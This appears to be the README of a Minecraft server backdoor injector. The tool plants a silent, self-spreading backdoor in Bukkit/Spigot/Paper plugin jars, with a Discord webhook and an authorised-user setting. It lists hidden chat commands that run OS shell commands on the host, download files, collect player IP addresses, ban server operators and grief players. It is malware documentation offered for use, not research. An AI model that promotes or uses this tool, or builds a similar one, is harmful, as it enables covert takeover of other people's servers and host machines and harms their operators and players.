A silent, spreading backdoor for Minecraft Bukkit/Spigot/Paper servers. Using the injector is recommended, should you choose to manually backdoor a plugin, you're on your own if you run into problems.
This is an archived repo, no support will be offered, and no bugs will be fixed.
- Java 8 runtime.
- Desired target plugin jar file.
- Run backdoor-(version).jar.
- Select desired plugin file.
- Input your Minecraft UUID.
- Input chat command prefix. (Default: #)
Java -jar backdoor.jar (filename) [options]
- --help / -h : Display syntax message in console
- --offline / -o : Use usernames instead of UUID
- --users / -u : UUID's or Usernames of authorized users. If not used, all users will be allowed.
- --prefix / -p (Default: '#') : Prefix for backdoor commands.
- --discord /-d : Discord webhook url. See Readme.
- --spread / -s : Spread to other plugins.
- --debug / -b : Send debug messages in console. Use this before creating issue reports.
- In a discord server, open Server Settings, Then "Integrations"
- Press 'Create Webhook'
- Name and profile picture can be customised, then press "Copy Webhook URL"
- Paste into injector / command line.
Default command prefix is #
, this can be changed.
- #help - display all command, or description of command
- #op - op specified player
- #deop - deop specified player
- #ban - ban player with reason and source
- #banip - ip ban player with reason and source
- #gm - switch to specified gamemode
- #give - give the specified item in specified quantities
- #exec - execute command as server console [Visible]
- #shell - execute operating system command as host [Visible]
- #info - shows information about server
- #chaos - deop and ban ops, op all regular players, run this while not being op yourself [Visible]
- #seed - get the current world seed
- #psay - sends messages as player
- #ssay - sends message as Server
- #rename - changes your nick
- #reload - Reloads the server [Visible]
- #getip - gets ip of the player
- #listworlds - displays all worlds
- #makeworld - creates new world [Visible]
- #delworld - deletes a world [Visible]
- #vanish - makes you vanish, tab included
- #silktouch - gives player silk touch hands
- #instabreak - let's player mine instantly
- #crash - crashes player's name
- #troll - Troll player in various ways
- #lock - locks the console or blocks player
- #unlock - unlocks the console or unblocks player
- #mute - mutes a player
- #unmute - unmutes a player
- #download - downloads a file
- #coords - get the coordinates of specified player
- #tp - teleport to specified coordinates [Visible]
- #stop - shutdown the server [Visible, See below.]
Commands listed as [Visible] will be noticeable in Server console and or in-game chat.
Warning: Teleporting may cause a '[player name] moved to quickly!' warning in server console. It may also cause anti-cheat to kick you. Other strange behavior may occur when teleporting extreme distances. (such as to the world border)
- clear - Clear all status of player. This will also reset Instabreak, Vanish, and silktouch
- thrower - Spam player with stacks of stone
- interact - Disable world interaction
- cripple - Player will be frozen in place
- flight - Player unable to fly, even in creative mode.
- inventory - Disable inventory interaction
- mine - Player unable to mine blocks
- login - Player will be unable to login, generating fake error messages
- god - Immortality
- damage - Player unable to deal damage
This software is provided under the GPL3 License.
Credit to Rikonardo for his Bukloit project, which helped in the development of the Injector. Thanks to @DarkReaper231 for additional features.